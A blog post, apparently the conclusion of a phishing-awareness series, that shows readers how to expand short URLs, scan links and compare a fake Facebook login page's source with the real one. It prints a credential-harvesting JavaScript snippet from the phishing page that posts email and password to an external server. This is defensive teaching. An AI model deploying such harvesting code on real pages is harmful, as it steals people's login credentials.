Phish like a Phisher, Defend like a Guardian, The Concluding Part.
Thank you for joining me here! I hope you enjoyed my previous articles. If you haven’t read them yet, please check out the first and second articles before proceeding to the conclusion.
By the end of this article, you’ll be equipped to strengthen your security posture with the help of skilled allies, family, and community members.
Let’s dive into how to defend like a guardian!
Whenever you receive messages or emails of this type, think twice. Here’s what to watch for:
- Urgency
- Fear
- Curiosity
- Trust
- Greed
Also, check for grammatical errors and any suspicious or malicious links.
How can I find out the source of a link before clicking on it and where it redirects? Short URLs can be deceptive in today’s digital landscape.
Now, let’s go to this website to uncover where the short URL redirects.
Paste the link into the URL text box
Relax….
If you still have doubts about the information above, don’t worry you’ll learn to defend like a guardian, I promise!
Let’s visit this website to determine whether our link is malicious, after that we’ve uncovered the redirect link.
Copy and paste your redirect link into the URL field.
I’ll explore other security vendors with you.
What else do I need to do? This information can be overwhelming. Let’s break down the URL and compare it to the source code of the Facebook page.
Let’s take a look at the webpage.
The first red flags on this website are the URL and the interface. Let’s review the source code. Right-click and select ‘View Page Source.
const body = {
data,
email: vEmail,
password: vPassword,
};
axios
.post('/contact', body)
.then(({ data }) => {
window.location = data; // Redirects the user
})
.catch((err) => {
window.location = 'https://www.livebotola.com/'; // Redirects on error
})The above code captures your credentials and sends them to https://api.sc0m.com/api/contact, which is likely a phishing server designed to store or misuse your information.
That’s concerning. When tools don’t provide effective solutions, think outside the box to demonstrate your skills.
Let’s review the source code of the actual website.
How can we determine if this code is secure?
<form class="_9vtf" data-testid="royal_login_form" action="/login/?privacy_mutation_token=..." method="post" id="u_0_2_Ux">- The
action="/login/?privacy_mutation_token=..."indicates the form is being sent to Facebook's login page. - The method is
POST, which securely transmits data (rather than GET, which exposes data in the URL).
I hope you appreciate the way you can defend like a guardian. We tested various security vendors’ URL tools, but they didn’t flag a phishing link that was stealing people’s credentials. I’m glad you found my explanation of analyzing page source codes helpful.
If you ever find yourself a victim of phishing, try this approach as an addition to your existing methods. We used URL scanning tools, and while they didn’t work for us, that doesn’t mean they aren’t useful.
Key Takeaway:
- Educate Your Team Regularly
- Don’t Trust Unknown Links or Attachments
- Check for Secure URLs (Look for HTTPS
- Keep Software and Security Tools Updated
- Hover the links, Don’t just click.
This is how you can address phishing activities in your organization, home, and community.
What else;
Make this a part of your daily routine.
Cybersecurity is Intention -Abdul Basit Rotimi
